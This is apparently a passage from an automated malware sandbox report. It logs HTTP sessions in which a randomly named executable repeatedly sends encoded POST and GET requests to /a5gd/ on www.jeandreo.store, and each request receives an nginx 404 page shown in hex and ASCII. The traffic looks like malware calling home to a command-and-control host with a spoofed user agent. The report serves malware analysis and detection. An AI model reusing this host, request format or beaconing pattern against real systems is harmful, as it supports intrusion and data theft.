                                                              Data Raw: 37 66 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 d0 9d d0 b5 20 d0 b7 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 be 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 63 79 72 69 6c 6c 69 63 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                                                              Data Ascii: 7f3<!doctype html><html><head> <title>404 </title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link href='https://fonts.googleapis.com/css?family=Open+Sans:400,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'> <style> body, html { height: 100%; margin: 0; display: flex; justify-content: center; align-items: center; background-color: #f1f4f5; color: #37474f; font-family: 'Open Sans', sans-serif; } .co
                                                              Sep 11, 2024 22:56:33.494895935 CEST1236INData Raw: 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 35 33 35 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e
                                                              Data Ascii: ntainer { display: flex; width: 535px; } .container-code{ min-width: 250px; text-align: center; } .container-text { min-width: 250px; paddi
                                                              Sep 11, 2024 22:56:33.494906902 CEST200INData Raw: be 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 74 65 78 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 5f 62 72
                                                              Data Ascii: </span> </div> <div class="container-text"> <span class="error_brief"> </span> </div></div></body></html>0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.759690162.240.81.18805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:38.992166042 CEST702OUTPOST /a5gd/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.jeandreo.store
                                                              Origin: http://www.jeandreo.store
                                                              Cache-Control: max-age=0
                                                              Content-Length: 219
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.jeandreo.store/a5gd/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 43 73 31 50 6f 78 73 69 58 2b 65 6f 6d 6e 43 63 65 45 4c 6d 74 4b 54 4e 47 74 61 57 64 4f 2b 48 57 41 42 6f 36 4f 6a 72 79 41 71 6c 6c 6a 74 38 76 41 48 38 67 75 5a 41 42 34 63 35 50 61 31 44 45 69 50 37 6c 4a 50 54 2f 54 42 5a 59 2f 6f 45 33 75 72 47 50 37 2b 42 37 68 32 4a 74 4f 69 47 65 71 66 77 34 76 36 57 43 30 62 76 65 53 42 37 41 4f 54 69 68 53 6b 4c 48 75 49 4c 79 56 34 62 70 69 72 68 35 32 6c 35 4a 41 69 79 44 48 62 36 7a 35 4d 58 77 71 4a 73 56 34 36 43 49 78 6d 71 48 39 4e 32 68 48 73 41 79 36 66 50 79 4e 75 31 46 35 38 36 49 39 52 32 4e 46 71 33 78 56 69 76 50 4f 78 77 74 32 37 39 64 6e 67 49 7a 37 31 79 30 77 3d 3d
                                                              Data Ascii: XvhP6L=Cs1PoxsiX+eomnCceELmtKTNGtaWdO+HWABo6OjryAqlljt8vAH8guZAB4c5Pa1DEiP7lJPT/TBZY/oE3urGP7+B7h2JtOiGeqfw4v6WC0bveSB7AOTihSkLHuILyV4bpirh52l5JAiyDHb6z5MXwqJsV46CIxmqH9N2hHsAy6fPyNu1F586I9R2NFq3xVivPOxwt279dngIz71y0w==
                                                              Sep 11, 2024 22:56:39.549704075 CEST1236INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.20.1
                                                              Date: Wed, 11 Sep 2024 20:56:39 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3650
                                                              Connection: close
                                                              ETag: "663a05b6-e42"
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                              Sep 11, 2024 22:56:39.549715996 CEST224INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                                                              Sep 11, 2024 22:56:39.549726009 CEST1236INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                              Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                                                              Sep 11, 2024 22:56:39.549736977 CEST1127INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e
                                                              Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              30192.168.2.759691162.240.81.18805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:41.545917988 CEST722OUTPOST /a5gd/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.jeandreo.store
                                                              Origin: http://www.jeandreo.store
                                                              Cache-Control: max-age=0
                                                              Content-Length: 239
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.jeandreo.store/a5gd/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 43 73 31 50 6f 78 73 69 58 2b 65 6f 6b 48 79 63 53 44 33 6d 38 61 54 4f 44 74 61 57 55 75 2f 4f 57 42 39 6f 36 50 6e 37 79 79 65 6c 6c 42 6c 38 75 42 48 38 6e 75 5a 41 4b 59 64 7a 53 4b 31 45 45 69 43 47 6c 4d 33 54 2f 58 70 5a 59 2b 59 45 30 66 72 48 50 72 2b 66 79 42 32 4c 69 75 69 47 65 71 66 77 34 76 48 7a 43 30 7a 76 65 44 78 37 44 72 2f 68 69 53 6b 4b 58 4f 49 4c 32 56 35 7a 70 69 72 35 35 30 42 44 4a 43 71 79 44 47 4c 36 77 6f 4d 57 70 61 4a 75 66 59 37 38 62 7a 4f 6e 65 63 5a 6c 69 30 6f 32 7a 4e 50 33 36 62 7a 58 66 62 77 57 57 73 70 4e 4a 48 4f 42 6d 7a 2f 61 4e 50 31 6f 67 55 50 63 43 51 46 69 2b 70 55 32 69 41 2f 38 36 54 6e 74 4f 4c 2b 68 37 55 51 68 75 58 38 41 76 4f 51 3d
                                                              Data Ascii: XvhP6L=Cs1PoxsiX+eokHycSD3m8aTODtaWUu/OWB9o6Pn7yyellBl8uBH8nuZAKYdzSK1EEiCGlM3T/XpZY+YE0frHPr+fyB2LiuiGeqfw4vHzC0zveDx7Dr/hiSkKXOIL2V5zpir550BDJCqyDGL6woMWpaJufY78bzOnecZli0o2zNP36bzXfbwWWspNJHOBmz/aNP1ogUPcCQFi+pU2iA/86TntOL+h7UQhuX8AvOQ=
                                                              Sep 11, 2024 22:56:42.410636902 CEST1236INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.20.1
                                                              Date: Wed, 11 Sep 2024 20:56:42 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3650
                                                              Connection: close
                                                              ETag: "663a05b6-e42"
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                              Sep 11, 2024 22:56:42.410662889 CEST224INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                                                              Sep 11, 2024 22:56:42.410676956 CEST1236INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                              Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                                                              Sep 11, 2024 22:56:42.410737038 CEST1127INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e
                                                              Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.759692162.240.81.18805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:44.085916996 CEST1735OUTPOST /a5gd/ HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.jeandreo.store
                                                              Origin: http://www.jeandreo.store
                                                              Cache-Control: max-age=0
                                                              Content-Length: 1251
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Referer: http://www.jeandreo.store/a5gd/
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Data Raw: 58 76 68 50 36 4c 3d 43 73 31 50 6f 78 73 69 58 2b 65 6f 6b 48 79 63 53 44 33 6d 38 61 54 4f 44 74 61 57 55 75 2f 4f 57 42 39 6f 36 50 6e 37 79 79 6d 6c 6c 79 39 38 73 6d 62 38 6d 75 5a 41 48 34 64 77 53 4b 31 56 45 69 61 43 6c 4d 79 6b 2f 52 74 5a 65 73 67 45 31 74 50 48 42 72 2b 66 74 52 32 4b 74 4f 69 54 65 71 50 30 34 72 6e 7a 43 30 7a 76 65 42 70 37 58 4f 54 68 6b 53 6b 4c 48 75 49 50 79 56 35 49 70 6b 44 48 35 30 56 54 4a 78 53 79 44 6e 37 36 79 61 55 57 67 61 4a 6f 63 59 37 30 62 7a 54 6e 65 59 78 58 69 33 31 5a 7a 4b 37 33 35 36 47 4b 4e 49 45 76 56 65 46 4a 50 78 43 32 72 79 48 70 4b 64 4e 59 34 48 6e 35 41 68 49 57 33 70 6f 2b 72 77 53 6b 75 6a 58 42 57 4a 32 53 31 6b 46 53 72 6c 56 4c 38 71 58 43 69 6c 55 43 43 54 34 76 77 62 65 5a 31 53 62 4e 55 39 46 4a 6e 62 68 7a 33 68 45 74 42 78 4e 30 30 51 4b 58 4a 67 67 68 74 6b 63 79 6d 32 65 2f 66 7a 6f 4f 2b 68 77 2b 51 5a 72 51 4f 6e 61 78 2f 70 30 45 4d 65 4b 49 5a 4c 64 69 57 4f 56 4f 62 65 50 46 6a 44 34 6f 59 58 58 2b 37 79 43 45 49 2b 72 [TRUNCATED]
                                                              Data Ascii: XvhP6L=Cs1PoxsiX+eokHycSD3m8aTODtaWUu/OWB9o6Pn7yymlly98smb8muZAH4dwSK1VEiaClMyk/RtZesgE1tPHBr+ftR2KtOiTeqP04rnzC0zveBp7XOThkSkLHuIPyV5IpkDH50VTJxSyDn76yaUWgaJocY70bzTneYxXi31ZzK7356GKNIEvVeFJPxC2ryHpKdNY4Hn5AhIW3po+rwSkujXBWJ2S1kFSrlVL8qXCilUCCT4vwbeZ1SbNU9FJnbhz3hEtBxN00QKXJgghtkcym2e/fzoO+hw+QZrQOnax/p0EMeKIZLdiWOVObePFjD4oYXX+7yCEI+r+N5675ThwypcAWajtxjUYStn+GYm8c9P0LWLEnZQs/aqphUh4uKKkSKFanFQasYCISMSIRvfL03IlDvwJs/b/TUqWFzVshHPkFmRhAXt4X8aX2zoBcc7RzA5EYw1EnsJ0sbnTK83JRY6yGOwOJwXTsnelAM0lao8yZytr4X2iU9uk86MX/70rM4iy62O8O6ZqdlPez3gPfkRToAgu8r3GGz6JMhTKxnsNqsmIBxHXdoYKsFpmEfbrQ3Z+pL5htxbTfc9n3NVto7JIxkvKTupyeQufn2g5qY3lw/3KrL8YOC5T/Vlx9PeBF8gUvHp8n8gXG0NmDf3dFVYS9A3F0MxQLv71fufflM4C9hgZb/G6mhl11G7EtGozxPy/uHh/HDwuRDiaCHjfGqi+lRRvgpQ2gYXYEBN8g5QGAMIXwWSdUoDy+F+AZ4vig0mQeoDUP5uixYKGs0GIDGZ6HClbZzWKAyhzSrVfISO6kVt8ZZlHBidLyQmTH+4n+S0EvV31ZPABmN0gq6HC8xU2vY6+Cc1VfVpiUmOGi33eKzdMa0pq42N1YZqOvkkNkLvU7yANsMWfPKZAG9gEU+EtZbZEMBFyYmKPmvQPE/DpTRLpUKNTdw4lnb7ztlHcig2iDEXHt6OTCKhRewRkk01l6mZMwfcEcDsfxbVErpiQJ [TRUNCATED]
                                                              Sep 11, 2024 22:56:44.656251907 CEST1236INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.20.1
                                                              Date: Wed, 11 Sep 2024 20:56:44 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3650
                                                              Connection: close
                                                              ETag: "663a05b6-e42"
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                              Sep 11, 2024 22:56:44.656274080 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                                                              Sep 11, 2024 22:56:44.656286001 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                                                              Sep 11, 2024 22:56:44.656297922 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                                              Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.759693162.240.81.18805428C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 11, 2024 22:56:46.628933907 CEST442OUTGET /a5gd/?XvhP6L=PudvrHhxWdfxtGGhQSPM4Nv1Dcz9A9OmcQNSz/CJh1KNnxIb2QXQvP51CacMS4xZciC0s5SL/yVXPvg6yOeNO+2G0wSJvvCXF5bk0r60CWn1bzRkQZzJoS1GIdNZy2RK3STysnFtIBWS&Xt7D=9p4tP8lp52ndpXM HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US,en;q=0.9
                                                              Host: www.jeandreo.store
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G925A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                              Sep 11, 2024 22:56:47.204437971 CEST1236INHTTP/1.1 404 Not Found
                                                              Server: nginx/1.20.1
                                                              Date: Wed, 11 Sep 2024 20:56:47 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3650
                                                              Connection: close
                                                              ETag: "663a05b6-e42"
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                                                              Sep 11, 2024 22:56:47.204452038 CEST224INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                              Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
